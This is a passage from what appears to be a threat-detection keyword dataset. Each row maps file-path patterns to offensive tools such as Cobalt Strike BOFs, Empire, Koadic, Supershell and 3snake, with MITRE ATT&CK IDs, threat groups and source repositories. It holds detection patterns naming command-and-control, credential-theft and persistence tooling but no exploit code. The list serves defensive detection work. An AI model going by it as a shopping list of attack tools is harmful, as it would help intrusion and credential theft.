tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*/sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/StackCrypt.git*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*/stage_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/stager/powershell.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stager/powershell/payload.ps1*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/stagers/CSharpPS*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/StaticSyscallsAPCSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/StaticSyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/stinger_client.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/striker.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/Striker.git*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - 
T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/striker.local*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/striker.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/string_of_paerls.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/subdomains-10000.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/Suborner.git*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" 
+"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*/sullo/nikto*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*/sunlogin_rce*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*/Sup3r-Us3r/scripts/*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SweetPotato_CS*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
